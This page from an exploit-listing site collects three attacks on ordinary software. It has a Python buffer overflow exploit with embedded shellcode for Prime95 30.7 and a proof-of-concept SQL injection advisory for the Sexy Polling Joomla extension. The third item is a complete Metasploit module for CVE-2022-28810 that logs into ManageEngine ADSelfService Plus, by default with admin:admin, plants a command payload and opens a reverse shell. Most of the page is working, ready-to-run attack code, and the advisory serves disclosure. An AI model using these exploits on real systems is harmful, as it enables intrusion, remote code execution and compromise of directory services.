Latest exploits :: CodePwn

<pre><code># Exploit Title: Prime95 Version 30.7 build 9 Buffer Overflow RCE # Discovered by: Yehia Elghaly # Discovered Date: 2022-04-25 # Vendor Homepage: https://www.mersenne.org/ # Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip # Tested Version: 30.7 build 9 # Vulnerability Type: Buffer Overflow (RCE) Local # Tested on OS: Windows 7 Professional x86 # Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE # 1- How to use: open the program go to test-PrimeNet-check the square-Connections # 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open buffer = "A" * 144 jum = "\xd8\x29\xe7\x6e" #push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll) nop = "\x90" * 20 #Nob hot = "C" * 100 #sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload payload = b"" payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d" payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d" payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6" payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2" payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a" payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff" payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f" payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca" payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d" payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0" payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b" payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50" payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d" payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12" payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d" payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63" payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f" payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa" payload += b"\xc7\x33\x80\xb2" evil = buffer + jum + nop + payload file = open('PExploit.txt','w+') file.write(evil) file.close() </code></pre>

<pre><code>SexyPolling SQL Injection ==================== | Identifier: | AIT-SA-20220208-01| | Target: | Sexy Polling ( Joomla Extension) | | Vendor: | 2glux | | Version: | all versions below version 2.1.8 | | CVE: | Not yet | | Accessibility: | Remote | | Severity: | Critical | | Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) | Summary ======== [Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php. Vulnerability Description ==================== In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections. In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked: ``` $min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : ''; $max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : ''; ``` These are later used unfiltered by the WHERE clause: ``` $query_toal = "SELECT COUNT(sv.`id_answer`) total_count, MAX(sv.`date`) max_date, MIN(sv.`date`) min_date FROM `#__sexy_votes` sv JOIN `#__sexy_answers` sa ON sa.id_poll = '$polling_id' AND sa.published = '1' WHERE sv.`id_answer` = sa.id"; //if dates are sent, add them to query if ($min_date_sended != '' && $max_date_sended != '') $query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' "; ``` Proof Of Concept ============== To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe. HTTP-Request: ``` POST /components/com_sexypolling/vote.php HTTP/1.1 Host: joomla-server.local User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest HTTP_X_REAL_IP: 1.1.1.1 Content-Length: 193 Origin: joomla-server.local Connection: close Referer: joomla-server.local/index.php/component/search/ Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6 polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1 ``` The HTTP-Resoonse contains a mysql error: ``` HTTP/1.1 500 Internal Server Error Date: Wed, 15 Dec 2021 10:27:40 GMT Server: Apache/2.4.41 (Ubuntu) Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/ Content-Length: 4768 Connection: close Content-Type: application/json <!DOCTYPE html> <html lang="en-gb" dir="ltr"> <head> <meta charset="utf-8" /> <title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '00:00:00' AND sv.`date` <= '2021-12-14 23:59:59'' at line 12</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" /> ``` Vulnerable Versions ================ All versions below version 2.1.8 Tested Versions ============= Sexy Polling ( Joomla Extension) 2.1.7 Impact ====== An unauthenticated attacker could inject and execute SQL commands on the database. Mitigation ========= Sexy Polling 2.1.8 fixed that issue Vendor Contact Timeline ==================== | 2021-12-14 | Unable to find a contact of the vendor | | 2021-12-15 | Contacting Joomla Security Strike Team | | 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. | | 2022-01-01 | Sexy Polling releases 2.1.8 | | 2022-04-08 | Public Disclosure | *We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.* Advisory URL =========== [https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling) </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'ManageEngine ADSelfService Plus Custom Script Execution', 'Description' => %q{ This module exploits the "custom script" feature of ADSelfService Plus. The feature was removed in build 6122 as part of the patch for CVE-2022-28810. For purposes of this module, a "custom script" is arbitrary operating system command execution. This module uses an attacker provided "admin" account to insert the malicious payload into the custom script fields. When a user resets their password or unlocks their account, the payload in the custom script will be executed. The payload will be executed as SYSTEM if ADSelfService Plus is installed as a service, which we believe is the normal operational behavior. This is a passive module because user interaction is required to trigger the payload. This module also does not automatically remove the malicious code from the remote target. Use the "TARGET_RESET" operation to remove the malicious custom script when you are done. ADSelfService Plus uses default credentials of "admin":"admin" }, 'Author' => [ # Discovered and exploited by unknown threat actors 'Jake Baines', # Analysis, CVE credit, and Metasploit module 'Hernan Diaz', # Analysis and CVE credit 'Andrew Iwamaye', # Analysis and CVE credit 'Dan Kelley' # Analysis and CVE credit ], 'References' => [ ['CVE', '2022-28810'], ['URL', 'https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html'], ['URL', 'https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/'] ], 'DisclosureDate' => '2022-04-09', 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Privileged' => true, # false if ADSelfService Plus is not run as a service 'Stance' => Msf::Exploit::Stance::Passive, 'Targets' => [ [ 'Windows Command', { 'Arch' => ARCH_CMD, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/jjs_reverse_tcp' } } ], ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8888, 'DisablePayloadHandler' => true, 'JJS_PATH' => '..\\jre\\bin\\jjs.exe' }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options([ OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/']), OptString.new('USERNAME', [true, 'The administrator username', 'admin']), OptString.new('PASSWORD', [true, 'The administrator user\'s password', 'admin']), OptBool.new('TARGET_RESET', [true, 'On the target, disables custom scripts and clears custom script field', false]) ]) end ## # Because this is an authenticated vulnerability, we will rely on a version string # for the check function. We can extract the version (or build) from selfservice/index.html. ## def check res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/selfservice/index.html')) unless res return CheckCode::Unknown('The target failed to respond to check.') end unless res.code == 200 return CheckCode::Safe('Failed to retrieve /selfservice/index.html') end ver = res.body[/\.css\?buildNo=(?<build_id>[0-9]+)/, :build_id] if ver.nil? return CheckCode::Safe('Could not extract a version number') end if Rex::Version.new(ver) < Rex::Version.new('6122') return CheckCode::Appears("This determination is based on the version string: #{ver}.") end CheckCode::Safe("This determination is based on the version string: #{ver}.") end ## # Authenticate with the remote target. Login requires four steps: # # 1. Grab a CSRF token # 2. Post credentials to /ServletAPI/accounts/login # 3. Post credentials to /j_security_check # 4. Grab another CSRF token for authenticated requests # # @return a new CSRF token to use with authenticated requests ## def authenticate # grab a CSRF token from the index res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do') }) fail_with(Failure::Unreachable, 'The target did not respond') unless res fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['HttpOnly, adscsrf'].empty? csrf_tok = res.get_cookies_parsed['HttpOnly, adscsrf'].to_s[/HttpOnly, adscsrf=(?<token>[0-9a-f-]+); path=/, :token] fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok # send the first login request to get the ssp token res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/ServletAPI/accounts/login'), 'keep_cookies' => true, 'vars_post' => { 'loginName' => datastore['USERNAME'], 'domainName' => 'ADSelfService Plus Authentication', 'j_username' => datastore['USERNAME'], 'j_password' => datastore['PASSWORD'], 'AUTHRULE_NAME' => 'ADAuthenticator', 'adscsrf' => csrf_tok } }) fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200 # send the second login request to get the sso token res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/j_security_check'), 'keep_cookies' => true, 'vars_post' => { 'loginName' => datastore['USERNAME'], 'domainName' => 'ADSelfService Plus Authentication', 'j_username' => datastore['USERNAME'], 'j_password' => datastore['PASSWORD'], 'AUTHRULE_NAME' => 'ADAuthenticator', 'adscsrf' => csrf_tok } }) fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 302 # revisit authorization.do to complete authentication res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/authorization.do'), 'keep_cookies' => true }) fail_with(Failure::NoAccess, 'Log in attempt failed') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') if res.get_cookies_parsed.empty? || res.get_cookies_parsed['adscsrf'].empty? csrf_tok = res.get_cookies_parsed['adscsrf'].to_s[/adscsrf=(?<token>[0-9a-f-]+);/, :token] fail_with(Failure::UnexpectedReply, 'Failed to grab a CSRF token') unless csrf_tok print_good('Authentication successful') csrf_tok end ## # Triggering the payload requires user interaction. Using the default payload # handler will cause this module to exit after planting the payload, so the # module will spawn it's own handler so that it doesn't exit until a shell # has been received/handled. Note that this module is passive so it should # just be chilling quietly in the background. # # This code is largely copy/paste from windows/local/persistence.rb ## def create_multihandler(lhost, lport, payload_name) pay = framework.payloads.create(payload_name) pay.datastore['LHOST'] = lhost pay.datastore['LPORT'] = lport print_status('Starting exploit/multi/handler') # Set options for module mh = framework.exploits.create('multi/handler') mh.share_datastore(pay.datastore) mh.datastore['PAYLOAD'] = payload_name mh.datastore['EXITFUNC'] = 'thread' mh.datastore['ExitOnSession'] = true # Validate module options mh.options.validate(mh.datastore) # Execute showing output mh.exploit_simple( 'Payload' => mh.datastore['PAYLOAD'], 'LocalInput' => user_input, 'LocalOutput' => user_output, 'RunAsJob' => true ) # Check to make sure that the handler is actually valid # If another process has the port open, then the handler will fail # but it takes a few seconds to do so. The module needs to give # the handler time to fail or the resulting connections from the # target could end up on on a different handler with the wrong payload # or dropped entirely. Rex.sleep(5) return nil if framework.jobs[mh.job_id.to_s].nil? return mh.job_id.to_s end # The json policy blob that ADSSP provides us is not accepted by ADSSP # if we try to POST it back. Specifically, ADSP is very unhappy about all # the booleans using "true" or "false" instead of "1" or "0" *except* for # HIDE_CAPTCHA_RPUA which has to remain a boolean. Sounds unbelievable, but # here we are. def fix_adssp_json(json_hash) json_hash.map do |key, value| if value.is_a? Hash [key, fix_adssp_json(value)] elsif value.is_a? Array value = value.map do |array_val| if array_val.is_a? Hash array_val = fix_adssp_json(array_val) end array_val end [key, value] elsif key == 'HIDE_CAPTCHA_RPUA' [key, value] elsif value.is_a? TrueClass [key, 1] elsif value.is_a? FalseClass [key, 0] else [key, value] end end.to_h end def exploit csrf_tok = authenticate # Grab the list of configured policies policy_list_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getPolicyConfigDetails') print_status("Requesting policy list from #{policy_list_uri}") res = send_request_cgi({ 'method' => 'GET', 'uri' => policy_list_uri }) fail_with(Failure::UnexpectedReply, 'Log in attempt failed') unless res.code == 200 policy_json = res.get_json_document fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if policy_json.nil? policy_details_json = policy_json['POLICY_DETAILS'] fail_with(Failure::UnexpectedReply, "The target didn't have any configured policies") if policy_details_json.nil? # There can be multiple policies. This logic will loop over each one, grab the configuration # details, update the configuration to include our payload, and then POST it back. policy_details_json.each do |policy_entry| policy_id = policy_entry['POLICY_ID'] policy_name = policy_entry['POLICY_NAME'] fail_with(Failure::UnexpectedReply, 'Policy details missing name or id') if policy_id.nil? || policy_name.nil? print_status("Requesting policy details for #{policy_name}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/getAPCDetails'), 'vars_get' => { 'POLICY_ID' => policy_id } }) fail_with(Failure::UnexpectedReply, 'Acquiring specific policy details failed') unless res.code == 200 # load the JSON and insert (or remove) our payload specific_policy_json = res.get_json_document fail_with(Failure::UnexpectedReply, "The target didn't return a JSON body") if specific_policy_json.nil? fail_with(Failure::UnexpectedReply, "The target didn't contain the expected JSON") if specific_policy_json['SCRIPT_COMMAND_RESET'].nil? new_payload = "cmd.exe /c #{payload.encoded}" if datastore['TARGET_RESET'] print_status('Disabling custom script functionality') specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '0' specific_policy_json['SCRIPT_COMMAND_RESET'] = '' specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '0' specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = '' else print_status('Enabling custom scripts and inserting the payload') specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_RESET'] = '1' specific_policy_json['SCRIPT_COMMAND_RESET'] = new_payload specific_policy_json['IS_CUSTOM_SCRIPT_ENABLED_UNLOCK'] = '1' specific_policy_json['SCRIPT_COMMAND_UNLOCK'] = new_payload end # fix up the ADSSP provided json so ADSSP will accept it o.O updated_policy = fix_adssp_json(specific_policy_json).to_json policy_update_uri = normalize_uri(target_uri.path, '/ServletAPI/configuration/policyConfig/setAPCDetails') print_status("Posting updated policy configuration to #{policy_update_uri}") res = send_request_cgi({ 'method' => 'POST', 'uri' => policy_update_uri, 'vars_post' => { 'APC_SETTINGS_DETAILS' => updated_policy, 'POLICY_NAME' => policy_name, 'adscsrf' => csrf_tok } }) fail_with(Failure::UnexpectedReply, 'Policy update request failed') unless res.code == 200 # spawn our own payload handler? if !datastore['TARGET_RESET'] && datastore['DisablePayloadHandler'] listener_job_id = create_multihandler(datastore['LHOST'], datastore['LPORT'], datastore['PAYLOAD']) if listener_job_id.blank? print_error("Failed to start exploit/multi/handler on #{datastore['LPORT']}, it may be in use by another process.") end else print_good('Done!') end end end end </code></pre>